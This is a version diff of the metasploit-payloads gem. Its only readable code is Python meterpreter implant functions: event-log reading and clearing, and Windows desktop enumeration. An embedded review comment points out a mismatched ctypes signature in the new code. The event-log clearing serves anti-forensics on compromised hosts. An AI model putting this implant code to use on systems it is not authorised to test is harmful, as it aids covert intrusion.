metasploit-payloads 2.0.104 → 2.0.106

Files changed (76) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data/data/android/meterpreter.jar +0 -0
  4. data/data/android/metstage.jar +0 -0
  5. data/data/android/shell.jar +0 -0
  6. data/data/meterpreter/elevator.x64.debug.dll +0 -0
  7. data/data/meterpreter/elevator.x64.dll +0 -0
  8. data/data/meterpreter/elevator.x86.debug.dll +0 -0
  9. data/data/meterpreter/elevator.x86.dll +0 -0
  10. data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
  11. data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
  12. data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
  13. data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
  14. data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
  15. data/data/meterpreter/ext_server_espia.x64.dll +0 -0
  16. data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
  17. data/data/meterpreter/ext_server_espia.x86.dll +0 -0
  18. data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
  19. data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
  20. data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
  21. data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
  22. data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
  23. data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
  24. data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
  25. data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
  26. data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
  27. data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
  28. data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
  29. data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
  30. data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
  31. data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
  32. data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
  33. data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
  34. data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
  35. data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
  36. data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
  37. data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
  38. data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
  39. data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
  40. data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
  41. data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
  42. data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
  43. data/data/meterpreter/ext_server_priv.x64.dll +0 -0
  44. data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
  45. data/data/meterpreter/ext_server_priv.x86.dll +0 -0
  46. data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
  47. data/data/meterpreter/ext_server_python.x64.dll +0 -0
  48. data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
  49. data/data/meterpreter/ext_server_python.x86.dll +0 -0
  50. data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
  51. data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
  52. data/data/meterpreter/ext_server_stdapi.py +128 -16
  53. data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
  54. data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
  55. data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
  56. data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
  57. data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
  58. data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
  59. data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
  60. data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
  61. data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
  62. data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
  63. data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
  64. data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
  65. data/data/meterpreter/metsrv.x64.debug.dll +0 -0
  66. data/data/meterpreter/metsrv.x64.dll +0 -0
  67. data/data/meterpreter/metsrv.x86.debug.dll +0 -0
  68. data/data/meterpreter/metsrv.x86.dll +0 -0
  69. data/data/meterpreter/screenshot.x64.debug.dll +0 -0
  70. data/data/meterpreter/screenshot.x64.dll +0 -0
  71. data/data/meterpreter/screenshot.x86.debug.dll +0 -0
  72. data/data/meterpreter/screenshot.x86.dll +0 -0
  73. data/lib/metasploit-payloads/version.rb +1 -1
  74. data.tar.gz.sig +0 -0
  75. metadata +2 -2
  76. metadata.gz.sig +0 -0
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: e6ecc9cab0b79200d38b046332bbe62e4859e300a340a40ce4b67f179e206ecc
4
- data.tar.gz: ead5bdae63b7a0420750de525ec873e377e2b9ef77f142b69e924c11a6ee834d
3
+ metadata.gz: 453b3c01afd395af3790b8a9393781f8a90c372945a8b9b4fa597bff94ec47ee
4
+ data.tar.gz: 16129f118a5a4cee8b66e4a37b824ecf8e0aed43be918ea9b5ef0b9a566d58bc
5
5
  SHA512:
6
- metadata.gz: 35dd5a3f541b769b67e66c59b701fbeff29f5626d3a3072255d842cfe419867ad3cb579a0b10231a48e8f2aefdb8e904a78cb6bc3696da241d906d6f1f8b18ba
7
- data.tar.gz: '080dfdd332d9f9fe280e472727a5f5cdb98bbdde4e80715f18fe1f69f04145bb874dfb686a126814224531f661ead4d0bb8d3ec63f08deb0fd2175ce4463d731'
6
+ metadata.gz: 263ccd130cdac66596843e65b9eac343be1bf554896eef1903a6180cf6955326b967a901b0fe7bef73a9e1f1435178d2d47e74aee1c7f4d247e565504726030b
7
+ data.tar.gz: 63b34db9fe29f7c6bd2d643b40b6a3fdc3963e994226235888de75da78e5d918caa911734b652dfea415a00f4211dede45180e02334fe8111644ba761e17bdc7
checksums.yaml.gz.sig CHANGED
Binary file
Binary file
Binary file
Binary file
Binary file
Binary file
@@ -1,4 +1,5 @@
1
1
  import fnmatch
2
+ import functools
2
3
  import getpass
3
4
  import os
4
5
  import platform
@@ -669,7 +670,11 @@ TLV_TYPE_TERMINAL_COLUMNS = TLV_META_TYPE_UINT | 2601
669
670
  ##
670
671
  TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
671
672
  TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
672
- TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
673
+
674
+ TLV_TYPE_DESKTOP = TLV_META_TYPE_GROUP | 3004
675
+ TLV_TYPE_DESKTOP_SESSION = TLV_META_TYPE_UINT | 3005
676
+ TLV_TYPE_DESKTOP_STATION = TLV_META_TYPE_STRING | 3006
677
+ TLV_TYPE_DESKTOP_NAME = TLV_META_TYPE_STRING | 3007
673
678
 
674
679
  ##
675
680
  # Event Log
@@ -744,6 +749,9 @@ VER_PLATFORM_WIN32s = 0x0000
744
749
  VER_PLATFORM_WIN32_WINDOWS = 0x0001
745
750
  VER_PLATFORM_WIN32_NT = 0x0002
746
751
 
752
+ # Windows Access Controls
753
+ MAXIMUM_ALLOWED = 0x02000000
754
+
747
755
  WIN_AF_INET = 2
748
756
  WIN_AF_INET6 = 23
749
757
 
@@ -1440,7 +1448,10 @@ def stdapi_sys_power_exitwindows(request, response):
1440
1448
  @register_function_if(has_windll)
1441
1449
  def stdapi_sys_eventlog_open(request, response):
1442
1450
  source_name = packet_get_tlv(request, TLV_TYPE_EVENT_SOURCENAME)['value']
1443
- handle = ctypes.windll.advapi32.OpenEventLogW(None, source_name)
1451
+ OpenEventLogA = ctypes.windll.advapi32.OpenEventLogA
1452
+ OpenEventLogA.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
1453
+ OpenEventLogA.restype = ctypes.c_void_p
1454
+ handle = OpenEventLogA(None, bytes(source_name, 'UTF-8'))
1444
1455
  if not handle:
1445
1456
  return error_result_windows(), response
1446
1457
  response += tlv_pack(TLV_TYPE_EVENT_HANDLE, handle)
@@ -1451,13 +1462,15 @@ def stdapi_sys_eventlog_read(request, response):
1451
1462
  handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
1452
1463
  flags = packet_get_tlv(request, TLV_TYPE_EVENT_READFLAGS)['value']
1453
1464
  offset = packet_get_tlv(request, TLV_TYPE_EVENT_RECORDOFFSET)['value']
1454
- adv32 = ctypes.windll.advapi32
1455
- bytes_read = ctypes.c_ulong(0)
1456
- bytes_needed = ctypes.c_ulong(0)
1457
- if adv32.ReadEventLogW(handle, flags, offset, ctypes.byref(bytes_read), 0, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
1465
+ bytes_read = ctypes.c_uint32(0)
1466
+ bytes_needed = ctypes.c_uint32(0)
1467
+ ReadEventLogA = ctypes.windll.advapi32.ReadEventLogA
1468
+ ReadEventLogA.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_uint32), ctypes.POINTER(ctypes.c_uint32)]
1469
+ ReadEventLogA.restype = ctypes.c_bool
1470
+ if ReadEventLogA(handle, flags, offset, ctypes.byref(bytes_read), 0, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
1458
1471
  return error_result_windows(), response
1459
- buf = ctypes.create_unicode_buffer(bytes_needed.value)
1460
- if not adv32.ReadEventLogW(handle, flags, offset, buf, bytes_needed, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
1472
+ buf = (ctypes.c_uint8 * bytes_needed.value)()
1473
+ if not ReadEventLogA(handle, flags, offset, buf, bytes_needed, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
1461
1474
  return error_result_windows(), response
1462
1475
  record = ctstruct_unpack(EVENTLOGRECORD, buf)
1463
1476
  response += tlv_pack(TLV_TYPE_EVENT_RECORDNUMBER, record.RecordNumber)
@@ -1466,8 +1479,9 @@ def stdapi_sys_eventlog_read(request, response):
1466
1479
  response += tlv_pack(TLV_TYPE_EVENT_ID, record.EventID)
1467
1480
  response += tlv_pack(TLV_TYPE_EVENT_TYPE, record.EventType)
1468
1481
  response += tlv_pack(TLV_TYPE_EVENT_CATEGORY, record.EventCategory)
1469
- response += tlv_pack(TLV_TYPE_EVENT_DATA, buf.raw[record.DataOffset:record.DataOffset + record.DataLength])
1470
- event_strings = buf.raw[record.StringOffset:].split('\x00', record.NumStrings)
1482
+ response += tlv_pack(TLV_TYPE_EVENT_DATA, ctarray_to_bytes(buf[record.DataOffset:record.DataOffset + record.DataLength]))
1483
+ event_string_buf = (ctypes.c_uint8 * len(buf[record.StringOffset:]))(*buf[record.StringOffset:])
1484
+ event_strings = ctarray_to_bytes(event_string_buf).split(NULL_BYTE, record.NumStrings)[:record.NumStrings]
1471
1485
  for event_string in event_strings:
1472
1486
  response += tlv_pack(TLV_TYPE_EVENT_STRING, event_string)
1473
1487
  return ERROR_SUCCESS, response
@@ -1475,14 +1489,20 @@ def stdapi_sys_eventlog_read(request, response):
1475
1489
  @register_function_if(has_windll)
1476
1490
  def stdapi_sys_eventlog_clear(request, response):
1477
1491
  handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
1478
- if not ctypes.windll.advapi32.ClearEventLogW(handle, None):
1492
+ ClearEventLogA = ctypes.windll.advapi32.ClearEventLogA
1493
+ ClearEventLogA.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
1494
+ ClearEventLogA.restype = ctypes.c_bool
1495
+ if not ClearEventLogA(handle, None):
1479
1496
  return error_result_windows(), response
1480
1497
  return ERROR_SUCCESS, response
1481
1498
 
1482
1499
  @register_function_if(has_windll)
1483
1500
  def stdapi_sys_eventlog_numrecords(request, response):
1484
1501
  handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
1485
- total = ctypes.c_ulong(0)
1502
+ total = ctypes.c_uint32(0)
1503
+ GetNumberOfEventLogRecords = ctypes.windll.advapi32.GetNumberOfEventLogRecords
1504
+ GetNumberOfEventLogRecords.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_uint32)]
1505
+ GetNumberOfEventLogRecords.restype = ctypes.c_bool
1486
1506
  if not ctypes.windll.advapi32.GetNumberOfEventLogRecords(handle, ctypes.byref(total)):
1487
1507
  return error_result_windows(), response
1488
1508
  response += tlv_pack(TLV_TYPE_EVENT_NUMRECORDS, total.value)
@@ -1491,16 +1511,22 @@ def stdapi_sys_eventlog_numrecords(request, response):
1491
1511
  @register_function_if(has_windll)
1492
1512
  def stdapi_sys_eventlog_oldest(request, response):
1493
1513
  handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
1494
- oldest = ctypes.c_ulong(0)
1495
- if not ctypes.windll.advapi32.GetOldestEventLogRecordW(handle, ctypes.byref(oldest)):
1514
+ GetOldestEventLogRecord = ctypes.windll.advapi32.GetOldestEventLogRecord
1515
+ GetOldestEventLogRecord.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_uint32)]
1516
+ GetOldestEventLogRecord.restype = ctypes.c_bool
1517
+ oldest = ctypes.c_uint32(0)
1518
+ if not GetOldestEventLogRecord(handle, ctypes.byref(oldest)):
1496
1519
  return error_result_windows(), response
1497
- response += tlv_pack(TLV_TYPE_EVENT_RECORDNUMBER, oldest)
1520
+ response += tlv_pack(TLV_TYPE_EVENT_RECORDNUMBER, oldest.value)
1498
1521
  return ERROR_SUCCESS, response
1499
1522
 
1500
1523
  @register_function_if(has_windll)
1501
1524
  def stdapi_sys_eventlog_close(request, response):
1502
1525
  handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
1503
- if not ctypes.windll.advapi32.CloseEventLogW(handle):
1526
+ CloseEventLog = ctypes.windll.advapi32.CloseEventLog
1527
+ CloseEventLog.argtypes = [ctypes.c_void_p]
1528
+ CloseEventLog.restype = ctypes.c_bool
1529
+ if not CloseEventLog(handle):
1504
1530
  return error_result_windows(), response
1505
1531
  return ERROR_SUCCESS, response
1506
1532
 
@@ -2755,6 +2781,92 @@ def stdapi_ui_get_idle_time(request, response):
2755
2781
  response += tlv_pack(TLV_TYPE_IDLE_TIME, idle_time)
2756
2782
  return ERROR_SUCCESS, response
2757
2783
 
2784
+ @register_function_if(has_windll)
2785
+ def stdapi_ui_desktop_enum(request, response):
2786
+
2787
+ response_parts = []
2788
+ if ctypes.sizeof(ctypes.c_long) == ctypes.sizeof(ctypes.c_void_p):
2789
+ LPARAM = ctypes.c_long
2790
+ elif ctypes.sizeof(ctypes.c_longlong) == ctypes.sizeof(ctypes.c_void_p):
2791
+ LPARAM = ctypes.c_longlong
2792
+
2793
+ DESKTOPENUMPROCA = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_char_p, LPARAM)
2794
+ EnumDesktopsA = ctypes.windll.user32.EnumDesktopsA
2795
+ EnumDesktopsA.argtypes = [ctypes.c_void_p, DESKTOPENUMPROCA, LPARAM]
2796
+ EnumDesktopsA.restype = ctypes.c_long
2797
+
2798
+ WINSTAENUMPROCA = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_char_p, LPARAM)
2799
+ EnumWindowStationsA = ctypes.windll.user32.EnumWindowStationsA
2800
+ EnumWindowStationsA.argtypes = [WINSTAENUMPROCA, LPARAM]
2801
+ EnumWindowStationsA.restype = ctypes.c_long
2802
+
2803
+ OpenWindowStationA = ctypes.windll.user32.OpenWindowStationA
2804
+ OpenWindowStationA.argtypes = [ctypes.c_char_p, ctypes.c_long, ctypes.c_bool]
2805
+ OpenWindowStationA.restype = ctypes.c_void_p
2806
+
2807
+ CloseWindowStation = ctypes.windll.user32.CloseWindowStation
2808
+ CloseWindowStation.argtypes = [ctypes.c_void_p]
2809
+ CloseWindowStation.restype = ctypes.c_long
2810
+
2811
+ GetCurrentProcessId = ctypes.windll.kernel32.GetCurrentProcessId
2812
+ GetCurrentProcessId.restype = ctypes.c_ulong
2813
+
2814
+ GetProcAddress = ctypes.windll.kernel32.GetProcAddress
2815
+ GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
2816
+ GetProcAddress.restype = ctypes.c_void_p
2817
+
2818
+ def get_session_id(pid):
2819
+ dwSessionId = ctypes.c_ulong(0)
2820
+
2821
+ ProcessIdToSessionId = ctypes.windll.kernel32.ProcessIdToSessionId
2822
+ ProcessIdToSessionId.argtypes = [ctypes.c_ulong, ctypes.POINTER(ctypes.c_ulong)]
2823
+ ProcessIdToSessionId.restype = ctypes.c_bool
2824
+
2825
+ if not ProcessIdToSessionId(ctypes.c_ulong(pid), ctypes.byref(dwSessionId)):
2826
+ dwSessionId = ctypes.c_ulong(-1)
2827
+
2828
+ return dwSessionId
2829
+
2830
+
2831
+ def desktop_enumdesktops_callback(response_parts, session_id, station_name, lpszDesktop, lParam):
2832
+ if not station_name or not lpszDesktop:
2833
+ return True
2834
+
2835
+ entry = bytes()
2836
+ entry += tlv_pack(TLV_TYPE_DESKTOP_SESSION, session_id)
2837
+ entry += tlv_pack(TLV_TYPE_DESKTOP_STATION, station_name)
2838
+ entry += tlv_pack(TLV_TYPE_DESKTOP_NAME, lpszDesktop.decode())
2839
+
2840
+ response_parts.append(tlv_pack(TLV_TYPE_DESKTOP, entry))
2841
+
2842
+ return True
2843
+
2844
+ @WINSTAENUMPROCA
2845
+ def desktop_enumstations_callback(lpszWindowStation, lParam):
2846
+ hWindowStation = OpenWindowStationA(lpszWindowStation, False, MAXIMUM_ALLOWED)
2847
+ if not hWindowStation:
2848
+ return True
2849
+
2850
+ callback = functools.partial(desktop_enumdesktops_callback, response_parts)
2851
+ session_id = get_session_id(GetCurrentProcessId()).value
2852
+ station_name = lpszWindowStation.decode()
2853
+ callback = functools.partial(desktop_enumdesktops_callback, response_parts, session_id, station_name)
2854
+ callback = DESKTOPENUMPROCA(callback)
2855
+ EnumDesktopsA(hWindowStation, callback, 0)
2856
+
2857
+ if hWindowStation:
2858
+ CloseWindowStation(hWindowStation)
2859
+
2860
+ return True
2861
+
2862
+ success = EnumWindowStationsA(desktop_enumstations_callback, 0)
2863
+ if not success:
2864
+ return error_result_windows(), response
2865
+
2866
+ response += bytes().join(response_parts)
2867
+
2868
+ return ERROR_SUCCESS, response
2869
+
2758
2870
  @register_function_if(has_termios and has_fcntl)
2759
2871
  def stdapi_sys_process_set_term_size(request, response):
2760
2872
  channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
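Review bot: In `desktop_enumstations_callback` the argtypes declared for `OpenWindowStationA` (`[ctypes.c_char_p, ctypes.c_long, ctypes.c_bool]`) do not match the Win32 signature `OpenWindowStationA(LPCSTR lpszWinSta, BOOL fInherit, ACCESS_MASK dwDesiredAccess)`, so the `MAXIMUM_ALLOWED` passed as the third argument is coerced through `c_bool` and the station is opened with access mask 1 instead of 0x02000000; this appears to work only because 1 happens to equal `WINSTA_ENUMDESKTOPS`. Declare `OpenWindowStationA.argtypes = [ctypes.c_char_p, ctypes.c_bool, ctypes.c_uint32]` so the access actually requested is the one passed to the kernel. The same function also carries an unused `GetProcAddress` binding and a first `callback = functools.partial(desktop_enumdesktops_callback, response_parts)` assignment that is immediately overwritten; both can be dropped. Separately, the new A-suffixed bindings encode `source_name` as UTF-8 for `OpenEventLogA` and `.decode()` station and desktop names as UTF-8, but these APIs use the system ANSI code page, so non-ASCII names would be mangled on either side; `'mbcs'` is the matching codec on Windows, or the W variants with `c_wchar_p` argtypes avoid the problem entirely.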
Binary file
Binary file
Binary file
Binary file
Binary file
Binary file
@@ -1,6 +1,6 @@
1
1
  # -*- coding:binary -*-
2
2
  module MetasploitPayloads
3
- VERSION = '2.0.104'
3
+ VERSION = '2.0.106'
4
4
 
5
5
  def self.version
6
6
  VERSION
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: metasploit-payloads
3
3
  version: !ruby/object:Gem::Version
4
- version: 2.0.104
4
+ version: 2.0.106
5
5
  platform: ruby
6
6
  authors:
7
7
  - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
96
96
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
97
97
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
98
98
  -----END CERTIFICATE-----
99
- date: 2022-12-13 00:00:00.000000000 Z
99
+ date: 2023-01-12 00:00:00.000000000 Z
100
100
  dependencies:
101
101
  - !ruby/object:Gem::Dependency
102
102
  name: rake
metadata.gz.sig CHANGED
Binary file